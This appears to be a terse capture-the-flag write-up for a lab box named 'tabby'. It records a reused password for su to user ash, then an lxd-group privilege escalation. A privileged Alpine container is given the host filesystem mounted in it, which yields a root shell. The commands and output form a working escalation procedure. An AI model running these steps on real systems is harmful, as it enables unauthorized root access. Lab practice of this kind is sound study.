5 tomcat > ash > root
Using password of zip for ash
su - ash
admin@it
whoami;id
ash
uid=1000(ash) gid=1000(ash) groups=1000(ash),4(adm),24(cdrom),30(dip),46(plugdev),116(lxd)
sudo -l
Sorry, user ash may not run sudo on tabby.
linEnum
[+] We're a member of the (lxd) group - could possibly misuse these rights!
uid=1000(ash) gid=1000(ash) groups=1000(ash),4(adm),24(cdrom),30(dip),46(plugdev),116(lxd)
We have a folder on desktop called snap
which has lxd
directory inside.
Using https://www.hackingarticles.in/lxd-privilege-escalation/
[on kali]
git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
sudo ./build-alpine
= created alpine.tar.gz, move it to target =
[target]
xc image list
+-------+-------------+--------+-------------+--------------+------+------+-------------+
| ALIAS | FINGERPRINT | PUBLIC | DESCRIPTION | ARCHITECTURE | TYPE | SIZE | UPLOAD DATE |
+-------+-------------+--------+-------------+--------------+------+------+-------------+
lxc image import /home/ash/alpine.tar.gz --alias kashz
lxc image list
+-------+--------------+--------+-------------------------------+--------------+-----------+--------+-------------------------------+
| ALIAS | FINGERPRINT | PUBLIC | DESCRIPTION | ARCHITECTURE | TYPE | SIZE | UPLOAD DATE |
+-------+--------------+--------+-------------------------------+--------------+-----------+--------+-------------------------------+
| kashz | a0ea33913002 | no | alpine v3.14 (20210616_17:12) | x86_64 | CONTAINER | 3.09MB | Jun 17, 2021 at 12:28am (UTC) |
+-------+--------------+--------+-------------------------------+--------------+-----------+--------+-------------------------------+
lxd init
(enter for all defaults)
lxc init kashz ignite -c security.privileged=true
Creating ignite
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh
/bin/sh: whoami;id
root
uid=0(root) gid=0(root)
Last updated